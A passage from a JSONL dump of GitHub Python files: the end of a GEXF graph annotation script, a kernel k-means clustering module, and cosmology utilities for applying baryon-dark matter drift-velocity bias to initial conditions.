{'class':'node','mode':'static'})\n else:\n node_attributes = attributes[attr_classes.index('node')]\n if not 'edge' in attr_classes:\n edge_attributes = etree.SubElement(graph, attrs_tag, {'class':'edge','mode':'static'})\n else:\n edge_attributes = attributes[attr_classes.index('edge')]\n graph.append(nodes)\n graph.append(edges)\n\n node_dict = {node.attrib['id']:node.attrib['label'] for node in nodes.iterfind('default:node', xmlns)}\n\n for name in node_annot:\n attr = etree.SubElement(node_attributes, attr_tag,\n {'id':name, 'title':name, 'type':node_ctypes[name]})\n logging.info(name)\n for node in nodes.iterfind('default:node', xmlns):\n label = node.attrib['label']\n if label in node_annot[name]:\n value = str(node_annot[name][label])\n else:\n continue\n if args['c'] is not None and name == args['c']:\n r,g,b,a = value.split(',')\n viz_color = node.find('viz:color', xmlns)\n if viz_color is not None:\n node.remove(viz_color)\n viz_color = etree.SubElement(node, color_tag, {'r':r,'g':g,'b':b,'a':a})\n else:\n attvalues = node.find('default:attvalues', xmlns)\n if attvalues is None:\n attvalues = etree.SubElement(node, attvs_tag)\n attv = etree.SubElement(attvalues, attv_tag,\n {'for':name, 'value':value})\n\n for name in edge_annot:\n attr = etree.SubElement(edge_attributes, attr_tag,\n {'id':name, 'title':name, 'type':node_ctypes[name]})\n logging.info(name)\n for edge in edges.iterfind('default:edge', xmlns):\n src = edge.attrib['source']\n tgt = edge.attrib['target']\n key = (str(node_dict[src]),str(node_dict[tgt]))\n if key in edge_annot[name]:\n value = str(edge_annot[name][key])\n else:\n continue\n if args['w'] is not None and name == args['w']:\n edge.set('weight', value)\n else:\n attvalues = edge.find('default:attvalues', xmlns)\n if attvalues is None:\n attvalues = etree.SubElement(edge, attvs_tag)\n attv = etree.SubElement(attvalues, attv_tag,\n {'for':name, 'value':value})\n\n tree.write('/dev/stdout', xml_declaration=True)\n\n\nif __name__ == '__main__':\n from docopt import docopt\n args = docopt(__doc__)\n args = {k.lstrip('-<').rstrip('>'):args[k] for k in args}\n try:\n main(args)\n except KeyboardInterrupt:\n logging.warning('Interrupted')\n sys.exit(1)\n","repo_name":"nh3/graph-utils","sub_path":"annotateGexf.py","file_name":"annotateGexf.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33127622699","text":"import numpy as np\nimport numba as nb\nfrom sklearn.utils import check_random_state\n\n\n################################################################################\n# Utils\n\n@nb.jit(nopython=True, nogil=True, parallel=True)\ndef square_euclidean_distance(samples_1, samples_2):\n \"\"\"\n Computes the squared Euclidean distance between two sets of samples.\n \"\"\"\n distance_matrix = np.zeros((samples_1.shape[0], samples_2.shape[0]))\n for j in nb.prange(samples_1.shape[0]):\n for i in range(j + 1, samples_2.shape[0]):\n for v in range(samples_1.shape[1]):\n distance_matrix[j, i] += (samples_1[j, v] - samples_2[i, v])**2\n if j < samples_2.shape[0] and i < samples_1.shape[0]:\n distance_matrix[i, j] = distance_matrix[j, i]\n\n return distance_matrix\n\n\n################################################################################\n# Kernels\n\nclass GaussianKernel:\n \"\"\"\n Computes the Gaussian kernel of the matrix of pairwise Euclidean distance\n between the samples.\n\n Parameters\n ----------\n gamma : float, optional\n Coefficient of the Gaussian kernel.\n \"\"\"\n def __init__(self, gamma=None):\n \n self.gamma = gamma\n \n def __call__(self, samples):\n\n kernel_matrix = square_euclidean_distance(samples, samples)\n\n gamma = self.gamma\n if gamma is None:\n sigma = 0.2*np.max(kernel_matrix)\n gamma = 1/(2.*sigma**2)\n\n return np.exp(-gamma*kernel_matrix)\n\n\n################################################################################\n# Kernel k-means\n\nclass KernelKMeans:\n \"\"\"\n Kernel k-means clustering.\n \n Parameters\n ----------\n n_clusters : int, optional\n Number of clusters to form.\n init : {'random', 'k-means++'}, optional\n Method to initialize the labels, either 'random' or 'k-means++'.\n k-means++ is a method to improve convergence. It is not the default\n option to stay closer to the original ANODI implementation.\n n_init : int, optional\n Number of times the clustering is applied with different seeds, the\n final result being the one with the lowest inertia.\n max_iter : int, optional\n Maximum number of iterations of the k-means algorithm.\n kernel : kernel object or function, ndarray, or None, optional\n Kernel to compute the kernel matrix from the data. If a kernel object,\n it must have a __call__ function with a single argument (the data) that\n returns a ndarray (the kernel matrix). A kernel function must fit the\n same input and output. An ndarray must be a kernel matrix. None means\n that a normal k-means is used.\n verbose : bool, optional\n If True, print information about the successive steps, if False, nothing\n is printed.\n random_state : int or RandomState instance, optional\n If int, random_state is the seed used by the random number generator;\n If RandomState instance, random_state is the random number generator;\n If None, the random number generator is the RandomState instance used by\n 'np.random'.\n \n Attributes\n ----------\n labels_ : array, shape (n_samples)\n Store the label of the cluster associated to each sample.\n \n References\n ----------\n Based on the following MATLAB implementation:\n https://github.com/xtan1/comparingGSalgorithms/blob/f02c20f3f163e87b35ecdb90d3f42e4a7e7fa10b/dualkmeansFast.m\n Shawe-Taylor, J. & Cristianini, N. (2011).\n Kernel Methods for Pattern Analysis.\n Cambridge University Press, https://doi.org/10.1017/CBO9780511809682\n Arthur, D. & Vassilvitskii, S. (2007).\n k-means++: the advantages of careful seeding.\n Proceedings of the eighteenth annual ACM-SIAM symposium on Discrete algorithms, 1027–1035\n \"\"\"\n def __init__(self,\n n_clusters=2,\n init='random',\n n_init=10,\n max_iter=300,\n kernel=GaussianKernel(),\n verbose=False,\n random_state=None):\n self.n_clusters = n_clusters\n self.init = init\n self.n_init = n_init\n self.max_iter = max_iter\n self.kernel = kernel\n self.verbose = verbose\n self.random_state = random_state\n \n def _initialize(self, matrix, random_state):\n \"\"\"\n Initializes the labels at random or using the k-means++ method\n \"\"\"\n if random_state is None:\n random_state = check_random_state(self.random_state)\n else:\n random_state = check_random_state(random_state)\n \n n = matrix.shape[0]\n if self.init == 'k-means++':\n centroids = [random_state.randint(n)]\n while len(centroids) < self.n_clusters:\n centroid_distances = matrix[centroids]\n if self.kernel is None:\n centroid_distances = square_euclidean_distance(centroid_distances,\n matrix)\n distances = np.min(centroid_distances, axis=0)**2\n distances /= np.sum(distances)\n centroid = random_state.choice(n, p=distances)\n centroids.append(centroid)\n centroid_distances = matrix[centroids]\n if self.kernel is None:\n centroid_distances = square_euclidean_distance(centroid_distances,\n matrix)\n return np.argmin(centroid_distances, axis=0)\n else:\n return random_state.randint(self.n_clusters, size=n)\n \n def _fit_single(self, kernel_matrix, init_labels):\n \"\"\"\n Computes the kernel k-means clustering for a single initialization\n \"\"\"\n labels = init_labels\n n = kernel_matrix.shape[0]\n cluster_matrix = np.zeros((n, self.n_clusters))\n cluster_matrix[np.arange(n), labels] = 1\n\n change = True\n it = 0\n while change == True and it < self.max_iter:\n if self.verbose:\n print('Iteration ', it + 1, '/', self.max_iter, sep='')\n \n change = False\n\n nb_cluster_samples = np.sum(cluster_matrix, axis=0)\n nb_cluster_samples[nb_cluster_samples != 0.] = 1./nb_cluster_samples[nb_cluster_samples != 0.]\n E = cluster_matrix@np.diag(nb_cluster_samples)\n KE = kernel_matrix@E\n cluster_distances = -2*KE + np.diag(E.T@KE)\n new_labels = np.argmin(cluster_distances, axis=1)\n\n for i in range(n):\n if labels[i] != new_labels[i]:\n cluster_matrix[i, new_labels[i]] = 1\n cluster_matrix[i, labels[i]] = 0\n change = True\n\n labels = new_labels\n it += 1\n \n distances = cluster_distances[np.arange(cluster_distances.shape[0]),\n labels]\n inertia = np.sum(distances)\n\n return labels, inertia, it\n \n def fit(self, X):\n \"\"\"\n Computes the kernel k-means clustering\n \n Parameters\n ----------\n X : array, shape (n_samples, n_features)\n Training instances to cluster.\n \"\"\"\n random_state = check_random_state(self.random_state)\n \n self.labels_ = None\n self.inertia_ = None\n self.n_iter_ = None\n \n if self.kernel is not None:\n if isinstance(self.kernel, np.ndarray):\n kernel_matrix = self.kernel\n else:\n kernel_matrix = self.kernel(X)\n else:\n kernel_matrix = X@X.T\n \n seeds = random_state.randint(np.iinfo(np.int32).max, size=self.n_init)\n for seed in seeds:\n if self.kernel is not None:\n labels = self._initialize(kernel_matrix, seed)\n else:\n labels = self._initialize(X, seed)\n labels, inertia, it = self._fit_single(kernel_matrix, labels)\n \n if self.inertia_ is None or inertia < self.inertia_:\n self.labels_ = labels.copy()\n self.inertia_ = inertia\n self.n_iter_ = it\n \n return self\n","repo_name":"grongier/pyanodi","sub_path":"pyanodi/kernel_k_means.py","file_name":"kernel_k_means.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32044765800","text":"\"\"\"\nUtility functions to include drift velocity in grafIC ics by computing/convolving density\npower spectrum k dependent bias. Contains routines to run CICsASS\n\"\"\"\nimport sys\nimport numpy as np\nfrom py_vbc import run_pyvbc\n\ndef fft_sample_spacing(N, boxsize):\n from cosmology import _fft_sample_spacing\n return _fft_sample_spacing(N, boxsize)\n\n\ndef fft_sample_spacing_components(N):\n from cosmology import _fft_sample_spacing_components\n return _fft_sample_spacing_components(N)\n\ndef vbc_rms(vbc_field):\n '''\n Computes the rms vbc in the box. Do not use for interpolated v_bc\n -- gives too much credance to the unphysical values at the edges\n of the box. Use vbc_med instead.\n '''\n rms = np.sqrt(np.mean(vbc_field ** 2))\n return rms\n\n\ndef vbc_med(vbc_field):\n \"\"\"\n Computes the median vbc in the box. Better for interpolated\n (particularly non-periodic) interpolated values.\n \"\"\"\n med = np.median(vbc_field)\n\n return med\n\n\ndef vbc_patch_dist(vbc_field, origin):\n import matplotlib.pyplot as plt\n \n nbins = (vbc_field.shape[0] * vbc_field.shape[1] *\n vbc_field.shape[2]) // 4000 # keep ~4000 elements in each bin\n\n rms = np.sqrt(np.mean(vbc_field ** 2))\n rms_cut = np.sqrt(np.mean(vbc_field[vbc_field<50] ** 2))\n med = np.median(vbc_field)\n # rmm = np.sqrt(np.median(vbc_field**2))\n\n fig, ax = plt.subplots(figsize=(6, 6))\n ax.hist(vbc_field.ravel(), bins=nbins, histtype='step')\n ax.axvline(rms, c='r', ls='solid', label='rms')\n ax.axvline(med, c='m', ls='dotted', label='median')\n # ax.axvline(rmm, c='g', ls='dotted', label='rmm')\n ax.axvline(rms_cut, c='saddlebrown', ls='dashed', label='rms $<$ 50 km s$^{{-1}}$ cut')\n ax.set_xlabel('v$_{{\\\\sf bc}}$ (km s$^{{-1}}$)')\n ax.set_ylabel('N')\n ax.legend()\n fig.savefig('vbc_dist_{0}_{1}_{2}.pdf'.format(\n origin[0], origin[1], origin[2]), bbox_inches='tight')\n \n \ndef msg(rank, s, verbose=True):\n if verbose:\n print('[rank {0:03d}]: {1}'.format(rank, s), flush=True)\n else:\n return\n\ndef apply_density_bias(ics, k_bias, b, N, delta_x=None):\n ''' Apply a bias to the realisations power spectrum, and recompute the 3D field.\n Parameters:\n b (array): bias to deconvolve with the delta_x field, such that:\n delta_x = ifft(delta_k/b)\n '''\n import scipy.fftpack as fft\n import scipy.interpolate as si\n\n if delta_x is None:\n delta_x = ics\n\n # The actual shape of the delta_x region\n shape = delta_x.shape\n # The shape of the symmetric box\n shape0 = (shape[0], shape[0], shape[0])\n\n boxsize = float(ics.boxsize) * \\\n (float(N) / float(ics.N)) # this boxsize is the reduced one\n\n # print \"boxsize = \", boxsize, delta_x.shape[0]\n\n # k = None\n if boxsize != ics.boxsize:\n # Resample k as we may be using a subregion\n # k = fft_sample_spacing(delta_x.shape[0], boxsize).flatten()\n pass\n else:\n # k = ics.k.flatten()\n print('ics.boxsize:', ics.boxsize)\n print('ics.N:', ics.N)\n print('N:', N)\n print('boxsize:', boxsize)\n # Resample k as we may be using a subregion\n k = fft_sample_spacing(delta_x.shape[0], boxsize).flatten()\n \n k[k == 0.] = (2. * np.pi) / boxsize\n\n # Interpolate/extrapolate the bias to the 3D grid\n def log_interp1d(xx, yy, kind='linear'):\n logx = np.log10(xx)\n logy = np.log10(yy)\n lin_interp = si.InterpolatedUnivariateSpline(logx, logy)\n log_interp = lambda zz: np.power(10.0, lin_interp(np.log10(zz)))\n return log_interp\n\n f = log_interp1d(k_bias, b)\n b = f(k)\n\n\n # print('LC testing')\n # print(np.any(np.isnan(b)))\n # print('LC testing before fft')\n # print(np.any(np.isnan(delta_x)))\n delta_k = fft.fftn(delta_x)\n # print('LC testing after fft')\n # print(np.any(np.isnan(delta_k)))\n\n # print('max before mult', delta_k.max())\n # print('max b.reshape(delta_k.shape)', b.reshape(delta_k.shape).max())\n # if b.reshape(delta_k.shape).max() > 1:\n # np.savetxt('k.dat', k)\n # np.savetxt('b.dat', b)\n \n # Apply the bias\n # delta_k *= np.sqrt(b.reshape(delta_k.shape))\n delta_k = delta_k * np.sqrt(b.reshape(delta_k.shape))\n print('max after mult', delta_k.max())\n\n \n print('LC testing after mult')\n print(np.any(np.isnan(delta_k)))\n\n \n # Inverse FFT to compute the realisation\n\n delta_x = fft.ifftn(delta_k).real.reshape(shape)\n \n return delta_x\n\n\ndef apply_velocity_bias(ics, k_bias, b, N, vel=None):\n \"\"\"\n Calculate the velocity bias. Here, the bias has to be vectorised since we \n have vx, vy and vz.\n\n :param ics: \n :param k_bias: \n :param b: \n :param N: \n :param vel: \n :returns: \n :rtype: \n\n \"\"\"\n \n return\n\n\ndef compute_bias(ics, vbc, zstart=1000, kmin=0.1, kmax=10000, n=100, delta=False):\n \"\"\"\n Computes the bias to /both/ density and velocity fields. Assumes\n v_bc is constant at z=zstart.\n\n :param ics: (Snapshot) Snapshot object containing grafic ICs\n\n :param vbc: (array) Array containing the v_bc (i.e. |v_b - v_c|)\n field.\n\n :param zstart: float, redshift of recombination\n :param kmin: float, minimum k-value to solve for in py_vbc\n (Mpc^-1)\n :param kmax: float, maximum k-value to solve for in py_vbc\n (Mpc^-1)\n :param n: int, number of k-values in total if positive, ~number per\n log10(k) if negative\n \"\"\"\n # Compute size of grid and boxsize\n N = vbc.shape[0]\n boxsize = float(ics.boxsize) * (float(N) / float(ics.N))\n\n # v_bc redshifts away, so calculate the v_bc at z=zstart\n z = ics.z\n # zstart=1000\n \n # LC - switched to the median instead, as the rms was giving too\n # extreme values, particularly near the edge in non-periodic\n # interpolated vbc fields\n\n # Also LC: now that I'm actually properly interpolating with yt\n # I'll switch back to using the rms, which gives pretty much the\n # same result as the median now\n \n # rms = vbc_med(vbc)\n rms = vbc_rms(vbc)\n rms_recom = rms * (1. + zstart) / (1. + z)\n\n print(f' v_bc rms {rms:.2f} km/s recom {rms_recom:.2f} km/s')\n \n # Calculate how many samples we need for the given per log10(k)\n if (n < 0):\n dlk = np.log10(kmax) - np.log10(kmin)\n n = max([np.int(np.ceil(np.abs(n) * dlk)), 100])\n # print('compute_bias')\n # print('kmin', kmin, 'kmax', kmax, 'dlk', dlk, 'n', n)\n # sys.exit(0)\n \n # Boxsize doesn't make a difference when calculating the power\n # spectra using py_vbc. The power spectrum tuple contains (p_c, p_b, p_vc,\n # p_vb) and k is in units of Mpc^-1.\n k, ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3, kmin=kmin,\n kmax=kmax, n=n, delta=delta)\n k, ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3, kmin=kmin,\n kmax=kmax, n=n, delta=delta)\n\n # Calculate the biases\n b_c = ps_vbcrecom[0] / ps_vbc0[0]\n b_b = ps_vbcrecom[1] / ps_vbc0[1]\n b_vc = ps_vbcrecom[2] / ps_vbc0[2]\n b_vb = ps_vbcrecom[3] / ps_vbc0[3]\n\n return k, b_c, b_b, b_vc, b_vb\n\n\ndef cube_positions(ics, n, N=None):\n cubes = []\n if N is None:\n # Beware that ics.n is a tuple and ics.N is an int!\n # N = ics.N\n N = ics.n\n\n # if (N % n != 0):\n # raise Exception(\n # \"Cannot fit %d cubes into grid with size %d\" % (n, N))\n\n if ~np.all(np.mod(n, N)):\n raise Exception('Cannot fit {0} cubes in grid with size {1}'.format(n, N))\n \n dx_cells = N / n\n\n for i in range(int(n[0])):\n cen_i = dx_cells[0] * (i + 0.5)\n\n for j in range(int(n[1])):\n cen_j = dx_cells[1] * (j + 0.5)\n\n for k in range(int(n[2])):\n cen_k = dx_cells[2] * (k + 0.5)\n\n cubes.append([cen_i, cen_j, cen_k])\n\n return cubes, dx_cells\n\n\ndef divisors(number, mode='print'):\n n = 1\n while(n < number):\n if(number % n == 0):\n if mode is 'print':\n print(n)\n elif mode is 'yield':\n yield n\n else:\n pass\n n += 1\n\n\n# Python version of bash which\ndef which(program):\n import os\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\ndef clean(level):\n \"\"\"Clean up after execution has finished. Anything that needs to be\n got rid of can be done here.\n \"\"\"\n import shutil\n\n # Remove patches/\n shutil.rmtree('./patches/level_{0:03d}'.format(level))\n \n\n\n# def vbc_ps_fname(rms, z, boxsize):\n# import os\n# cwd = os.getcwd()\n# if not os.path.isdir(\"%s/vbc_TFs_out\" % cwd):\n# os.mkdir(\"%s/vbc_TFs_out\" % cwd)\n# return '%s/vbc_TFs_out/vbc_%f_z%f_B%1.2f.dat' % (cwd, rms, z, boxsize)\n\n\n# def run_cicsass_lc(boxsize, z, rms_vbc_z1000, N=256):\n# import subprocess, os, gc\n\n# exe = which('transfer.x')\n\n# if exe is None:\n# raise Exception(\"Unable to locate transfer.x executable\")\n\n# # Example execution for RMS vbc=30km/s @ z=1000.:\n# # ./transfer.x -B0.2 -N128 -V30 -Z100 -D3 -SinitSB_transfer_out\n\n# CICsASS_home = os.getenv(\"CICSASS_HOME\")\n# if CICsASS_home is None:\n# raise Exception(\"Env var CICSASS_HOME not set\")\n\n# # Run with N=256\n# # CICsASS_home = \"/lustre/scratch/astro/ds381/CICsASS/matt/Dropbox/CICASS/vbc_transfer/\"\n# cmd = 'cd %s && %s -B%1.2f -N%d -V%f -Z%f -D3 -SinitSB_transfer_out' % (\n# CICsASS_home, exe, boxsize, N, rms_vbc_z1000, z)\n# # print 'Running:\\n%s' % cmd\n\n# gc.collect() # Collect garbage\n\n# # Run CICsASS and wait for output, check_output is blocking and\n# # will return an Exception if cmd fails\n# output = subprocess.check_output(cmd, shell=True)\n# output = output.decode(\"ascii\")\n# output = output.splitlines()\n \n# vals = np.zeros(shape=(64, 4))\n\n# # This is slow but perhaps unavoidable\n# for i in range(64):\n# vals[i, :] = output[i].split()\n\n# # Transpose to match original code\n# vals = np.transpose(vals)\n# # and unpack\n# vals = [vals[0, :], vals[1, :], vals[2, :]]\n\n# gc.collect() # Collect garbage\n \n# return vals \n\n\n# def run_cicsass(boxsize, z, rms_vbc_z1000, out_fname, N=256):\n# import subprocess, os\n \n# exe = which('transfer.x')\n\n# if exe is None:\n# raise Exception(\"Unable to locate transfer.x executable\")\n\n# # Example execution for RMS vbc=30km/s @ z=1000.:\n# # ./transfer.x -B0.2 -N128 -V30 -Z100 -D3 -SinitSB_transfer_out\n\n# CICsASS_home = os.getenv(\"CICSASS_HOME\")\n# if CICsASS_home is None:\n# raise Exception(\"Env var CICSASS_HOME not set\")\n\n# # Run with N=256\n# # CICsASS_home = \"/lustre/scratch/astro/ds381/CICsASS/matt/Dropbox/CICASS/vbc_transfer/\"\n# cmd = 'cd %s && %s -B%1.2f -N%d -V%f -Z%f -D3 -Splanck2018_transfer_out > %s' % (\n# CICsASS_home, exe, boxsize, N, rms_vbc_z1000, z, out_fname)\n# # print 'Running:\\n%s' % cmd\n# # Run CICsASS and wait for output\n# code = subprocess.check_call(cmd, shell=True)\n# if code != 0:\n# raise Exception(\"CICsASS returned non-zero exit code: %d\", code)\n# return code\n\n\n# def compute_velocity_bias(ics, vbc):\n# import os, time\n# # print 'AVERAGE INSTEAD OF RMS'\n# # Init fields\n# if vbc is None:\n# vbc = ics['vbc']\n\n# # Compute size of grid and boxsize\n# N = vbc.shape[0]\n# boxsize = float(ics.boxsize) * \\\n# (float(N) / float(ics.N))\n\n# # Compute vbc @ z=1000\n# # vbc_norm = ics.vbc_rms_norm(vbc=vbc)\n# # vbc_rms = vbc_norm * (1001.) # vbc_rms prop (1 + z)\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(z + 1.0))\n\n# # Check for PS and run CICsASS if necessary\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if os.path.isfile(fname_vbc0) is False:\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if os.path.isfile(fname_vbcrecom) is False:\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n# # Load the power spectra and compute the bias\n# # LC - might be too quick for CICASS, check for empty files\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# count = 0\n# while ((len(ps_vbc0) == 0) or (len(ps_vbcrecom) == 0)):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. File still empty.\")\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n \n# # Should have same lenghts if finished writing\n# count = 0\n# try:\n# while len(ps_vbcrecom[1]) != len(ps_vbc0[1]):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. Filesizes still differ.\")\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# except Exception as e:\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n\n# cosmo = ics.cosmo\n\n# import cosmology\n# vdeltab0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[2]), **cosmo)\n# vdeltab = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[2]), **cosmo)\n\n# vdeltac0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[1]), **cosmo)\n# vdeltac = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[1]), **cosmo)\n\n# #CDM bias\n# b_cdm = vdeltac / vdeltac0\n# # Baryon bias/p/scratch/chpo22/hpo22i/bd/cicass/vbc_transfer/vbc_TFs_out/vbc_22.435140_z200.000005_B3.52.dat\n# b_b = vdeltab / vdeltab0\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_velocity_bias_lc(ics, vbc):\n# import os, time\n# # print 'AVERAGE INSTEAD OF RMS'\n# # Init fields\n# if vbc is None:\n# vbc = ics\n\n# # Compute size of grid and boxsize\n# N = vbc.shape[0]\n# boxsize = float(ics.boxsize) * \\\n# (float(N) / float(ics.N))\n\n# # Compute vbc @ z=1000\n# # vbc_norm = ics.vbc_rms_norm(vbc=vbc)\n# # vbc_rms = vbc_norm * (1001.) # vbc_rms prop (1 + z)\n# # Compute vbc @ z=1000\n# z = ics.z\n# zstart=1000\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# ps_vbc0 = run_cicsass_lc(boxsize, z, 0.)\n# ps_vbcrecom = run_cicsass_lc(boxsize, z, rms_recom)\n\n# # Boxsize doesn't make a difference when calculating the power spectra\n# # ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3)\n# # ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3)\n\n# cosmo = ics.cosmo\n\n# import cosmology\n# vdeltab0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[2]), **cosmo)\n# vdeltab = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[2]), **cosmo)\n\n# vdeltac0 = cosmology.linear_velocity_ps(\n# ps_vbc0[0], np.sqrt(ps_vbc0[1]), **cosmo)\n# vdeltac = cosmology.linear_velocity_ps(\n# ps_vbcrecom[0], np.sqrt(ps_vbcrecom[1]), **cosmo)\n\n# #CDM bias\n# b_cdm = vdeltac / vdeltac0\n# # Baryon bias/p/scratch/chpo22/hpo22i/bd/cicass/vbc_transfer/vbc_TFs_out/vbc_22.435140_z200.000005_B3.52.dat\n# b_b = vdeltab / vdeltab0\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"] # \"h Mpc**-1\"\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_cicsass(ics, vbc):\n# \"\"\"Function used to calculate all the cicass power spectra before\n# doing anything else. Not very efficient, but might be necessary.\"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\" \n\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# # Check for PS and run CICsASS if needed\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if not os.path.isfile(fname_vbc0):\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if not os.path.isfile(fname_vbcrecom):\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n\n# def compute_bias(ics, vbc):\n# \"\"\" Calculate the bias to the density power spectrum assuming\n# COHERENT vbc at z=1000. \"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\"\n\n# # Compute vbc @ z=1000\n# z = ics.z\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# # Check for PS and run CICsASS if needed\n# fname_vbc0 = vbc_ps_fname(0., z, boxsize)\n# if not os.path.isfile(fname_vbc0):\n# exit_code = run_cicsass(boxsize, z, 0., fname_vbc0)\n\n# fname_vbcrecom = vbc_ps_fname(rms_recom, z, boxsize)\n# if not os.path.isfile(fname_vbcrecom):\n# exit_code = run_cicsass(boxsize, z, rms_recom, fname_vbcrecom)\n\n# # Load the power spectra and compute the bias\n# # LC - might be too quick for CICASS, check for empty files\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# count = 0\n# while ((len(ps_vbc0) == 0) or (len(ps_vbcrecom) == 0)):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. File still empty.\")\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n\n# # Should have same lenghts if finished writing\n# count = 0\n# try:\n# while len(ps_vbcrecom[1]) != len(ps_vbc0[1]):\n# count += 1\n# if count > 10:\n# raise Exception(\"Reached sleep limit. Filesizes still differ\")\n# time.sleep(5)\n# ps_vbc0 = np.loadtxt(fname_vbc0, unpack=True)\n# ps_vbcrecom = np.loadtxt(fname_vbcrecom, unpack=True)\n# except Exception as e:\n# print(\"Caught exception (fname_vbc0): {0}\".format(fname_vbc0))\n# print(\"Caught exception (fname_vbcrecom): {0}\".format(fname_vbcrecom))\n\n# #CDM bias\n# b_cdm = ps_vbcrecom[1] / ps_vbc0[1]\n# # Baryon bias\n# b_b = ps_vbcrecom[2] / ps_vbc0[2]\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]\n\n# return k_bias, b_cdm, b_b\n\n\n# def compute_bias_lc(ics, vbc):\n# \"\"\" Calculate the bias to the density power spectrum assuming\n# COHERENT vbc at z=1000. \"\"\"\n# import os, time\n \n# # Compute size of grid and boxsize (for this patch)\n# N = vbc.shape[0]\n# boxsize = ics.boxsize * (float(N) / float(ics.N)) # \"Mpc a h**-1\"\n\n# # Compute vbc @ z=1000\n# z = ics.z\n# zstart = 1000\n# rms = vbc_rms(vbc)\n# rms_recom = rms * (1001./(1.0 + z))\n\n# ps_vbc0 = run_cicsass_lc(boxsize, z, 0.)\n# ps_vbcrecom = run_cicsass_lc(boxsize, z, rms_recom)\n \n# # Boxsize doesn't make a difference when calculating the power\n# # spectra using py_vbc\n# # ps_vbc0 = run_pyvbc(vbc=0.0, zstart=zstart, zend=z, dz=3)\n# # ps_vbcrecom = run_pyvbc(vbc=rms_recom, zstart=zstart, zend=z, dz=3)\n\n# #CDM bias\n# b_cdm = ps_vbcrecom[1] / ps_vbc0[1]\n# # Baryon bias\n# b_b = ps_vbcrecom[2] / ps_vbc0[2]\n# # Wavenumber\n# k_bias = ps_vbcrecom[0] / ics.cosmo[\"h\"]# \"h Mpc**-1\"\n \n# return k_bias, b_cdm, b_b\n","repo_name":"lconaboy/drft","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} 